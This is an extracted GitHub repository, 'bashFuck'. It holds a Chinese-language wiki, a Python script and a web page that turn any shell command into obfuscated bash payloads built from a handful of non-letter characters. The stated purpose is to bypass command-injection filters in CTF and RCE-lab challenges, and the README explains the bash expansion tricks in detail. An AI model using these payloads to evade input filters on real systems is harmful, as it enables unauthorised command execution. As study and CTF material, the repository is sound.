Repository: ProbiusOfficial/bashFuck
Branch: main
Commit: e07159f8f2de
Files: 5
Total size: 29.9 KB
Directory structure:
gitextract_fza8ppf3/
├── .github/
│ └── workflows/
│ └── static.yml
├── LICENSE
├── README.md
├── bashFuck.py
└── index.html
================================================
FILE CONTENTS
================================================
================================================
FILE: .github/workflows/static.yml
================================================
# Simple workflow for deploying static content to GitHub Pages
name: Deploy static content to Pages
on:
# Runs on pushes targeting the default branch
push:
branches: ["main"]
# Allows you to run this workflow manually from the Actions tab
workflow_dispatch:
# Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages
permissions:
contents: read
pages: write
id-token: write
# Allow only one concurrent deployment, skipping runs queued between the run in-progress and latest queued.
# However, do NOT cancel in-progress runs as we want to allow these production deployments to complete.
concurrency:
group: "pages"
cancel-in-progress: false
jobs:
# Single deploy job since we're just deploying
deploy:
environment:
name: github-pages
url: ${{ steps.deployment.outputs.page_url }}
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v4
- name: Setup Pages
uses: actions/configure-pages@v5
- name: Upload artifact
uses: actions/upload-pages-artifact@v3
with:
# Upload entire repository
path: '.'
- name: Deploy to GitHub Pages
id: deployment
uses: actions/deploy-pages@v4
================================================
FILE: LICENSE
================================================
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction,
and distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by
the copyright owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all
other entities that control, are controlled by, or are under common
control with that entity. For the purposes of this definition,
"control" means (i) the power, direct or indirect, to cause the
direction or management of such entity, whether by contract or
otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity
exercising permissions granted by this License.
"Source" form shall mean the preferred form for making modifications,
including but not limited to software source code, documentation
source, and configuration files.
"Object" form shall mean any form resulting from mechanical
transformation or translation of a Source form, including but
not limited to compiled object code, generated documentation,
and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or
Object form, made available under the License, as indicated by a
copyright notice that is included in or attached to the work
(an example is provided in the Appendix below).
"Derivative Works" shall mean any work, whether in Source or Object
form, that is based on (or derived from) the Work and for which the
editorial revisions, annotations, elaborations, or other modifications
represent, as a whole, an original work of authorship. For the purposes
of this License, Derivative Works shall not include works that remain
separable from, or merely link (or bind by name) to the interfaces of,
the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including
the original version of the Work and any modifications or additions
to that Work or Derivative Works thereof, that is intentionally
submitted to Licensor for inclusion in the Work by the copyright owner
or by an individual or Legal Entity authorized to submit on behalf of
the copyright owner. For the purposes of this definition, "submitted"
means any form of electronic, verbal, or written communication sent
to the Licensor or its representatives, including but not limited to
communication on electronic mailing lists, source code control systems,
and issue tracking systems that are managed by, or on behalf of, the
Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise
designated in writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity
on behalf of whom a Contribution has been received by Licensor and
subsequently incorporated within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the
Work and such Derivative Works in Source or Object form.
3. Grant of Patent License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
(except as stated in this section) patent license to make, have made,
use, offer to sell, sell, import, and otherwise transfer the Work,
where such license applies only to those patent claims licensable
by such Contributor that are necessarily infringed by their
Contribution(s) alone or by combination of their Contribution(s)
with the Work to which such Contribution(s) was submitted. If You
institute patent litigation against any entity (including a
cross-claim or counterclaim in a lawsuit) alleging that the Work
or a Contribution incorporated within the Work constitutes direct
or contributory patent infringement, then any patent licenses
granted to You under this License for that Work shall terminate
as of the date such litigation is filed.
4. Redistribution. You may reproduce and distribute copies of the
Work or Derivative Works thereof in any medium, with or without
modifications, and in Source or Object form, provided that You
meet the following conditions:
(a) You must give any other recipients of the Work or
Derivative Works a copy of this License; and
(b) You must cause any modified files to carry prominent notices
stating that You changed the files; and
(c) You must retain, in the Source form of any Derivative Works
that You distribute, all copyright, patent, trademark, and
attribution notices from the Source form of the Work,
excluding those notices that do not pertain to any part of
the Derivative Works; and
(d) If the Work includes a "NOTICE" text file as part of its
distribution, then any Derivative Works that You distribute must
include a readable copy of the attribution notices contained
within such NOTICE file, excluding those notices that do not
pertain to any part of the Derivative Works, in at least one
of the following places: within a NOTICE text file distributed
as part of the Derivative Works; within the Source form or
documentation, if provided along with the Derivative Works; or,
within a display generated by the Derivative Works, if and
wherever such third-party notices normally appear. The contents
of the NOTICE file are for informational purposes only and
do not modify the License. You may add Your own attribution
notices within Derivative Works that You distribute, alongside
or as an addendum to the NOTICE text from the Work, provided
that such additional attribution notices cannot be construed
as modifying the License.
You may add Your own copyright statement to Your modifications and
may provide additional or different license terms and conditions
for use, reproduction, or distribution of Your modifications, or
for any such Derivative Works as a whole, provided Your use,
reproduction, and distribution of the Work otherwise complies with
the conditions stated in this License.
5. Submission of Contributions. Unless You explicitly state otherwise,
any Contribution intentionally submitted for inclusion in the Work
by You to the Licensor shall be under the terms and conditions of
this License, without any additional terms or conditions.
Notwithstanding the above, nothing herein shall supersede or modify
the terms of any separate license agreement you may have executed
with Licensor regarding such Contributions.
6. Trademarks. This License does not grant permission to use the trade
names, trademarks, service marks, or product names of the Licensor,
except as required for reasonable and customary use in describing the
origin of the Work and reproducing the content of the NOTICE file.
7. Disclaimer of Warranty. Unless required by applicable law or
agreed to in writing, Licensor provides the Work (and each
Contributor provides its Contributions) on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
implied, including, without limitation, any warranties or conditions
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
PARTICULAR PURPOSE. You are solely responsible for determining the
appropriateness of using or redistributing the Work and assume any
risks associated with Your exercise of permissions under this License.
8. Limitation of Liability. In no event and under no legal theory,
whether in tort (including negligence), contract, or otherwise,
unless required by applicable law (such as deliberate and grossly
negligent acts) or agreed to in writing, shall any Contributor be
liable to You for damages, including any direct, indirect, special,
incidental, or consequential damages of any character arising as a
result of this License or out of the use or inability to use the
Work (including but not limited to damages for loss of goodwill,
work stoppage, computer failure or malfunction, or any and all
other commercial damages or losses), even if such Contributor
has been advised of the possibility of such damages.
9. Accepting Warranty or Additional Liability. While redistributing
the Work or Derivative Works thereof, You may choose to offer,
and charge a fee for, acceptance of support, warranty, indemnity,
or other liability obligations and/or rights consistent with this
License. However, in accepting such obligations, You may act only
on Your own behalf and on Your sole responsibility, not on behalf
of any other Contributor, and only if You agree to indemnify,
defend, and hold each Contributor harmless for any liability
incurred by, or claims asserted against, such Contributor by reason
of your accepting any such warranty or additional liability.
END OF TERMS AND CONDITIONS
APPENDIX: How to apply the Apache License to your work.
To apply the Apache License to your work, attach the following
boilerplate notice, with the fields enclosed by brackets "[]"
replaced with your own identifying information. (Don't include
the brackets!) The text should be enclosed in the appropriate
comment syntax for the file format. We also recommend that a
file or class name and description of purpose be included on the
same "printed page" as the copyright notice for easier
identification within third-party archives.
Copyright [yyyy] [name of copyright owner]
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
================================================
FILE: README.md
================================================
## **关于**
针对Linux终端 bashshell 的无字母命令执行的骚操作x
支持在线生成:https://probiusofficial.github.io/bashFuck/
Used in [【RCE-labs · level 9-12: BashFuck - 无字母命令执行】](https://github.com/ProbiusOfficial/RCE-labs) to simplify the generation process.
目前可以实现的字符集:
- `#` `$` `'` `(` `)` `0` `1` `<` `\` (9 Charset)
- `#` `$` `'` `(` `)` `0` `<` `\` `{` `}` (10 Charset)
- `!` `#` `$` `'` `(` `)` `<` `\` `{` `}` (10 Charset)
- `!` `$` `&` `'` `(` `)` `=` `< ` `\` `_` `{` `}` `~` (13 Charset)
...更多可能?
Idea来源于[CTFshow](https://www.ctf.show/)周末的极限挑战赛
(后面不定期有各种有意思的挑战赛哦~欢迎各位师傅来平台玩呀)
## **Usage**
*现已支持在线生成:https://probiusofficial.github.io/bashFuck/
使用python3运行bashFuck.py文件即可,根据提示输入你的命令,程序会自动为你生成从最基本的`$'\xxx'`形式到更复杂的形式。
```Bash
python bashFuck.py
```
## bashFuck-Wiki
### 前言
整个项目的核心是 Linux终端可以通过 `$'\xxx'` 的方式执行命令,xxx是字符ascii码的八进制形式,通过这一点,我们可以通过位运算符号和Linux终端的其他特性,在没有数字的情况下继续构造这样的形式以实现无字母数字仅用几个字符就实现任意命令执行。
当然本项目也有一定局限性,这取决于linux的系别,我们知道sh其实是一个软连接,在debian系操作系统中,sh指向dash;在centos系操作系统中,sh指向bash,这也是本项目名称为 Bashfuck 的原因。
### 原理解析
#### common_otc(cmd)
首先我们知道,在终端中,`$'\xxx'`可以将八进制ascii码解析为字符,仅基于这个特性,我们可以得到第一个函数`common_otc(cmd)`,该函数将传入的命令的每一个字符转换为`$'\xxx\xxx\xxx\xxx'`的形式,但是注意,如果为连续的一串`$'\xxx\xxx\xxx\xxx'`形式,则我们无法执行带参数的命令。
比如"`ls -l`"也就是`$'\154\163\40\55\154'`,因为这样会把整个字符串当作一个单词,而不会分割成不同的参数,这里涉及到bash的一个单词分割,在Bash中,单词分割是一种将参数扩展、命令替换和算术扩展的结果分割成多个单词的过程,它发生在双引号之外,并且受到IFS变量的影响
(简单提一嘴,IFS是一个环境变量,它定义了字段分隔符,也就是用来分割字符串的字符。默认情况下,空格、制表符和换行符被认为是字段分隔符)
如果一个字符串包含空格或其他IFS字符,它会被分割成多个单词,每个单词作为一个独立的参数传递给命令。
但因为八进制转义序列是在命令行解析之前就执行的,所以它不会触发单词分割
(具体原理可以参考:
【Bash word splitting mechanism】https://stackoverflow.com/questions/18498218/bash-word-splitting-mechanism
【$IFS】https://bash.cyberciti.biz/guide/$IFS
#### bashfuck_x(cmd, form)
基于上面的基本原理,我们引入一些表示特性和运算特性:
比如,在bash中,支持二进制的表示整数的形式:`$((2#binary))`。
通过阅读bash的参考文档https://www.gnu.org/software/bash/manual/bash.html
我们知道`$`作为一个特殊字符,有多样化的功能,比如`$()`可用来表示命令替换或者算术扩展。
在这里我们引入 `$(())` 也就是 算术扩展,让其在括号中执行运算再替换到当前位置。
如果括号里面没有东西的话,也就是为`0`,那么直接`echo $(())` 我们就可以得到字符 `0`
比如我们下面引入一些位运算
左移运算符: `1<<1`可以得到`2` ;
取反:我们在 `0` 的基础上取反,就可以得到字符 `-1` (这个原理很简单,因为`0`的二进制表示是`00000000`,取反后得到`11111111`,这个数在补码表示法下就是`-1`)
除了`$()` `$` 还可以 用`${}`的方式来扩展变量,具体的用法可以参考:https://stackoverflow.com/questions/5163144/what-are-the-special-dollar-sign-shell-variables
这里我们主要用到下面的特性:
`${#var}` 可以计算 `var`变量的字符长度:
当然 如果 `var` 是 `#` / `_` / `?`这样的本来获取的值就是一个字符特殊参数 那么字符本身为变量,输出 `1`,
如果var为NULL即不带参数 则为 `0`
将上面的几种特性结合起来,我们就能使用 `1` `0` / `0` 甚至不用数字来构造字符的八进制形式。
比如只使用0和1:位运算让我们可以很轻松获得数字2,在下面的整数表示中就可以使用`$(($((1<<1))#binary))`来表示任意数字,然后构造八进制
而在上面的基础上,我们用 `${##}` 来替换 `1` ,用 `${#}` 来替换 `0`
那么对于命令`ls`就有下面的几种写法。
```Bash
$\'\\$(($((1<<1))#10011010))\\$(($((1<<1))#10100011))\'
$\'\\$(($((${##}<<${##}))#${##}00${##}${##}0${##}0))\\$(($((${##}<<${##}))#${##}0${##}000${##}${##}))\'
$\'\\$(($((${##}<<${##}))#${##}${#}${#}${##}${##}${#}${##}${#}))\\$(($((${##}<<${##}))#${##}${#}${##}${#}${#}${#}${##}${##}))\'
```
但是上面的命令最终只能被bash还原为八进制转义序列,不会再进一步解析了:
至于为什么没有进一步解析,我们需要从bash的底层说起,我们可以看参考手册了解问题的所在: https://www.gnu.org/software/bash/manual/html_node/Shell-Expansions.html
```Bash
3.5 Shell Expansions
Expansion is performed on the command line after it has been split into s. There are seven kinds of expansion performed: token
brace expansion
tilde expansion
parameter and variable expansion
command substitution
arithmetic expansion
word splitting
filename expansion
The order of expansions is: brace expansion; tilde expansion, parameter and variable expansion, arithmetic expansion, and command substitution (done in a left-to-right fashion); word splitting; and filename expansion.
```
Bash在执行命令之前,会对命令行进行一系列的扩展(expansions),这些扩展包括花括号扩展(brace expansion)、波浪号扩展(tilde expansion)、**参数和变量扩展**(parameter and variable expansion)、**算术扩展(arithmetic expansion)、命令替换(command substitution)**、单词分割(word splitting)和文件名扩展(filename expansion)等,最重要的是这些扩展的顺序是固定的,而且是从左到右进行的。
也就是说,bash shell 会先对命令行中的花括号进行扩展,然后再对波浪号进行扩展,依次类推,直到完成所有的扩展为止。
我们上面的操作都是基于 **算术扩展和命令替换** 而八进制转义也就是 $'\xxx\xxx' 的执行则是依赖于**参数和变量扩展**
所以当把这一些列运算符解析成八进制转义的时候,已经执行过一次**参数和变量扩展**了,所以不会再次解析。
所以这里我们引入Linux Bash Shell的Here string语法(https://bash.cyberciti.biz/guide/Here_strings)
让八进制转义作为标准输入再完成一次解析:
```
bin/bash<<<str
```
但是这样得到的就是`$'\xxx\xxx\xxx\xxx'`命令解析形式,在前面我们说到,这种方式无法执行带参数的命令,其实到这里也好理解了,因为带参命令需要执行单词分割扩展,而解析在扩展之后,也就是说,八进制转义序列命令的解析没有单词分割这一步,而是把整个解析结果作为整体执行。
所以我们需要使用两次Here-string语法,让这个命令扩展执行两次以便完成所有的解析工作。
在前面我们提到,$作为一个特殊的字符,有很多功能(https://stackoverflow.com/questions/5163144/what-are-the-special-dollar-sign-shell-variables)
`$0` 可以表示当前脚本的文件名,在终端中,`$0`其实就是bash本身。
接下来 如果我们想要不用数字去构造的话,那么就要寻找`$0`的替换,这里还是直接啃参考手册(x
https://www.gnu.org/software/bash/manual/bash.html
这里使用间接扩展特性——`${!xxx}`,它表示用xxx的值作为另一个变量的名字,然后取出那个变量的值。例如,如果a=0,b=1,c=2,那么${!a}就相当于$0,${!b}就相当于$1,${!c}就相当于$2。所以我们只需要一个变量值为0的变量,就可以拿到sh
所以我们可以使用变量赋值,或者特殊参数构造,得到0
- `${#}`表示接受参数个数,在终端中参数为空 值为 0
- `${?}`表示上一条命令的退出状态,如果上一条命令异常 `${?}`值为1,如果正常退出则为0
- `${_}`表示上一个命令的最后一个参数。(如果上一个指令的输出是`0`的话,就能构造出sh了)
那么对于bash_x的三种写法也就容易理解了:
```Bash
Command:ls
Charset : # $ ' ( ) 0 1 < \
Total Used: 9
Total length = 69
Payload = $0<<<$0\<\<\<\$\'\\$(($((1<<1))#10011010))\\$(($((1<<1))#10100011))\'
---------------------------
Charset : # $ ' ( ) 0 < \ { }
Total Used: 10
Total length = 117
Payload = $0<<<$0\<\<\<\$\'\\$(($((${##}<<${##}))#${##}00${##}${##}0${##}0))\\$(($((${##}<<${##}))#${##}0${##}000${##}${##}))\'
---------------------------
Charset : ! # $ ' ( ) < \ { }
Total Used: 10
Total length = 147
Payload = ${!#}<<<${!#}\<\<\<\$\'\\$(($((${##}<<${##}))#${##}${#}${#}${##}${##}${#}${##}${#}))\\$(($((${##}<<${##}))#${##}${#}${##}${#}${#}${#}${##}${##}))\'
```
#### bashfuck_y(cmd)
在前面我们就提到过 `$(())` 的用法,在不使用`$((2#binary))`特性的情况下,我们还可以通过多个-1的叠加再取反去构造任意数字,于是就有了:
```Bash
oct_list = [ # 构造数字 0-7 以便于后续八进制形式的构造
'$(())', # 0
'$((~$(($((~$(())))$((~$(())))))))', # 1
'$((~$(($((~$(())))$((~$(())))$((~$(())))))))', # 2
'$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))))))', # 3
'$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))', # 4
'$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))', # 5
'$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))', # 6
'$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))', # 7
]
```
这样就可以使用`$(())`去构造`$'\xxx\xxx\xxx\xxx'`
再引入我们前面提到的,变量赋值,我们就可以轻松的用`$(())`拿到sh
```Bash
bashFuck = ''
bashFuck += '__=$(())' # set __ to 0
bashFuck += '&&' # splicing
bashFuck += '${!__}<<<${!__}\\<\\<\\<\\$\\\'' # got 'sh'
# bashFuck = __=$(())&&${!__}<<<${!__}\\<\\<\\<\\$\\\'
```
得到我们第四种payload形式:
```Bash
Command:ls
Charset : ! $ & ' ( ) < = \ _ { } ~
Total Used: 13
Total length = 393
Payload = __=$(())&&${!__}<<<${!__}\<\<\<\$\'\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\\$((~$(($((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))))))\'
```
### 总结
除开上面的几种写法,利用特性其实还能构造出不同的payload,或许还有一些方法没有被探索到,如果上面的文档存在错误欢迎师傅们指出捏,如果有新的想法也欢迎师傅们讨论。
效果展示:
================================================
FILE: bashFuck.py
================================================
def info(s):
total = 0
used_chars = set()
for c in s:
if c.isprintable() and c not in used_chars:
total += 1
used_chars.add(c)
return "Charset : " + ' '.join(sorted(used_chars)) + '\n' + f"Total Used: {total}" + '\n' + "Total length = " + str(
len(s)) + '\n' + "Payload = " + s + '\n' + "---------------------------"
def get_oct(c): # 将字符的ASCII值转换为二进制字符串,然后将其转换为八进制,去掉前缀“0o”
return (oct(ord(c)))[2:]
# def nomal_otc(cmd): # 注意,该方法无法执行带参数命令,如:ls -l
# payload = '$\''
# for c in cmd:
# payload += '\\' + get_oct(c)
# payload += '\''
# return info(payload)
def common_otc(cmd):
payload = '$\''
for c in cmd:
if c == ' ':
payload += '\' $\''
else:
payload += '\\' + get_oct(c)
payload += '\''
return info(payload)
def bashfuck_x(cmd, form):
bash_str = ''
for c in cmd:
bash_str += f'\\\\$(($((1<<1))#{bin(int(get_oct(c)))[2:]}))'
payload_bit = bash_str
payload_zero = bash_str.replace('1', '${##}') # 用 ${##} 来替换 1
payload_c = bash_str.replace('1', '${##}').replace('0', '${#}') # 用 ${#} 来替换 0
if form == 'bit':
payload_bit = '$0<<<$0\\<\\<\\<\\$\\\'' + payload_bit + '\\\''
return info(payload_bit)
elif form == 'zero':
payload_zero = '$0<<<$0\\<\\<\\<\\$\\\'' + payload_zero + '\\\''
return info(payload_zero)
elif form == 'c':
payload_c = '${!#}<<<${!#}\\<\\<\\<\\$\\\'' + payload_c + '\\\''
return info(payload_c)
def bashfuck_y(cmd):
oct_list = [ # 构造数字 0-7 以便于后续八进制形式的构造
'$(())', # 0
'$((~$(($((~$(())))$((~$(())))))))', # 1
'$((~$(($((~$(())))$((~$(())))$((~$(())))))))', # 2
'$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))))))', # 3
'$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))', # 4
'$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))', # 5
'$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))', # 6
'$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))', # 7
]
bashFuck = ''
bashFuck += '__=$(())' # set __ to 0
bashFuck += '&&' # splicing
bashFuck += '${!__}<<<${!__}\\<\\<\\<\\$\\\'' # got 'sh'
for c in cmd:
bashFuck += '\\\\'
for i in get_oct(c):
bashFuck += oct_list[int(i)]
bashFuck += '\\\''
return info(bashFuck)
def Generate(cmd):
print("Command: " + cmd)
print("Payload generated as follows:")
print(common_otc(cmd))
print(bashfuck_x(cmd, 'bit'))
print(bashfuck_x(cmd, 'zero'))
print(bashfuck_x(cmd, 'c'))
print(bashfuck_y(cmd))
def main():
print("This program is used to generate Payload for Bash to execute the given command. The program uses Bash's arithmetic and parameter extension capabilities to generate different forms of Payload to improve the chance of Bypass.")
print("Author: Github@Probius_Official")
cmd = input("input your command:")
Generate(cmd)
if __name__ == '__main__':
main()
================================================
FILE: index.html
================================================
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>BashFuck Payload Generator</title>
<style>
body {
font-family: Arial, sans-serif;
margin: 20px;
background-color: #f4f4f9;
color: #333;
}
h1 {
color: #333;
}
.input-container, .output-container {
margin-bottom: 20px;
}
textarea, .output-container textarea {
width: 100%;
padding: 10px;
font-family: monospace;
border: 2px solid #4a90e2;
border-radius: 8px;
resize: none;
font-size: 14px;
background-color: #f0f8ff;
outline: none;
box-sizing: border-box;
}
button {
padding: 10px 20px;
font-size: 16px;
background-color: #4a90e2;
color: white;
border: none;
border-radius: 8px;
cursor: pointer;
margin-top: 10px;
box-shadow: 0px 2px 5px rgba(0, 0, 0, 0.2);
}
button:hover {
background-color: #357ab8;
}
.container {
margin-bottom: 30px;
padding: 20px;
background-color: #fff;
border-radius: 10px;
box-shadow: 0px 0px 15px rgba(0, 0, 0, 0.1);
border: 2px solid #ddd;
box-sizing: border-box;
}
.payload-info {
font-weight: bold;
margin-bottom: 10px;
font-size: 14px;
}
.copy-btn {
float: right;
padding: 8px 15px;
background-color: #4a90e2;
color: white;
border: none;
border-radius: 5px;
cursor: pointer;
font-size: 14px;
}
.copy-btn:hover {
background-color: #357ab8;
}
.output-container {
display: flex;
flex-direction: column;
}
</style>
</head>
<body>
<h1>Payload Generator</h1>
<p>Enter your command below and generate the payloads for all formats.</p>
<div class="input-container">
<textarea id="cmdInput" placeholder="Enter command here..." rows="3"></textarea>
<button onclick="generatePayload()">Generate Payloads</button>
</div>
<div id="output" class="output-container"></div>
<script>
function info(s) {
let total = 0;
let usedChars = new Set();
for (let c of s) {
if (c.match(/[ -~]/) && !usedChars.has(c)) {
total++;
usedChars.add(c);
}
}
return {
charset: Array.from(usedChars).sort().join(' '),
totalUsed: total,
payloadLength: s.length,
payload: s
};
}
function getOct(c) {
return c.charCodeAt(0).toString(8); // 将字符的ASCII值转换为八进制字符串
}
function nomalOtc(cmd) {
let payload = "$'";
for (let c of cmd) {
payload += '\\' + getOct(c);
}
payload += "'";
return info(payload);
}
function bashfuckX(cmd, form) {
let bashStr = '';
for (let c of cmd) {
let binaryStr = parseInt(getOct(c), 10).toString(2);
bashStr += '\\\\$(($((1<<1))#' + binaryStr + '))';
}
let payloadBit = bashStr;
let payloadZero = bashStr.replace(/1/g, '${##}'); // 用 ${##} 来替换 1
let payloadC = bashStr.replace(/1/g, '${##}').replace(/0/g, '${#}'); // 用 ${#} 来替换 0
if (form === 'bit') {
payloadBit = '$0<<<$0\\<\\<\\<\\$\\\'' + payloadBit + '\\\'';
return info(payloadBit);
} else if (form === 'zero') {
payloadZero = '$0<<<$0\\<\\<\\<\\$\\\'' + payloadZero + '\\\'';
return info(payloadZero);
} else if (form === 'c') {
payloadC = '${!#}<<<${!#}\\<\\<\\<\\$\\\'' + payloadC + '\\\'';
return info(payloadC);
}
}
function bashfuckY(cmd) {
let octList = [
'$(())', // 0
'$((~$(($((~$(())))$((~$(())))))))', // 1
'$((~$(($((~$(())))$((~$(())))$((~$(())))))))', // 2
'$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))))))', // 3
'$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))', // 4
'$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))', // 5
'$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))', // 6
'$((~$(($((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))$((~$(())))))))', // 7
];
let bashFuck = '';
bashFuck += '__=$(())'; // set __ to 0
bashFuck += '&&'; // splicing
bashFuck += '${!__}<<<${!__}\\<\\<\\<\\$\\\''; // got 'sh'
for (let c of cmd) {
bashFuck += '\\\\';
for (let i of getOct(c)) {
bashFuck += octList[parseInt(i)];
}
}
bashFuck += '\\\'';
return info(bashFuck);
}
function generatePayload() {
const cmd = document.getElementById("cmdInput").value;
const outputDiv = document.getElementById("output");
outputDiv.innerHTML = ''; // 清空之前的输出
const payloads = [
{ title: 'Normal OTC', data: nomalOtc(cmd) },
{ title: 'Bit', data: bashfuckX(cmd, 'bit') },
{ title: 'Zero', data: bashfuckX(cmd, 'zero') },
{ title: 'C', data: bashfuckX(cmd, 'c') },
{ title: 'Bashfuck Y', data: bashfuckY(cmd) }
];
payloads.forEach(payload => {
const container = document.createElement('div');
container.classList.add('container');
const info = document.createElement('div');
info.classList.add('payload-info');
info.innerHTML = `Charset (${payload.data.totalUsed}) : ${payload.data.charset}<br>Payload length = ${payload.data.payloadLength}`;
container.appendChild(info);
const textarea = document.createElement('textarea');
textarea.value = payload.data.payload;
textarea.readOnly = true;
textarea.rows = 4;
container.appendChild(textarea);
const copyButton = document.createElement('button');
copyButton.classList.add('copy-btn');
copyButton.innerText = 'Copy';
copyButton.onclick = () => {
textarea.select();
document.execCommand('copy');
};
container.appendChild(copyButton);
outputDiv.appendChild(container);
});
}
</script>
</body>
</html>
gitextract_fza8ppf3/ ├── .github/ │ └── workflows/ │ └── static.yml ├── LICENSE ├── README.md ├── bashFuck.py └── index.html
SYMBOL INDEX (7 symbols across 1 files) FILE: bashFuck.py function info (line 1) | def info(s): function get_oct (line 12) | def get_oct(c): # 将字符的ASCII值转换为二进制字符串,然后将其转换为八进制,去掉前缀“0o” function common_otc (line 23) | def common_otc(cmd): function bashfuck_x (line 34) | def bashfuck_x(cmd, form): function bashfuck_y (line 52) | def bashfuck_y(cmd): function Generate (line 78) | def Generate(cmd): function main (line 88) | def main():
Condensed preview — 5 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (37K chars).
[
{
"path": ".github/workflows/static.yml",
"chars": 1250,
"preview": "# Simple workflow for deploying static content to GitHub Pages\nname: Deploy static content to Pages\n\non:\n # Runs on pus"
},
{
"path": "LICENSE",
"chars": 11357,
"preview": " Apache License\n Version 2.0, January 2004\n "
},
{
"path": "README.md",
"chars": 8267,
"preview": "## **关于**\n\n针对Linux终端 bashshell 的无字母命令执行的骚操作x \n\n支持在线生成:https://probiusofficial.github.io/bashFuck/\n\nUsed in [【RCE-labs ·"
},
{
"path": "bashFuck.py",
"chars": 3287,
"preview": "def info(s):\r\n total = 0\r\n used_chars = set()\r\n for c in s:\r\n if c.isprintable() and c not in used_chars"
},
{
"path": "index.html",
"chars": 6484,
"preview": "<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n <meta charset=\"UTF-8\">\n <meta name=\"viewport\" content=\"width=device-width"
}
]
About this extraction
This page contains the full source code of the ProbiusOfficial/bashFuck GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 5 files (29.9 KB), approximately 9.6k tokens, and a symbol index with 7 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.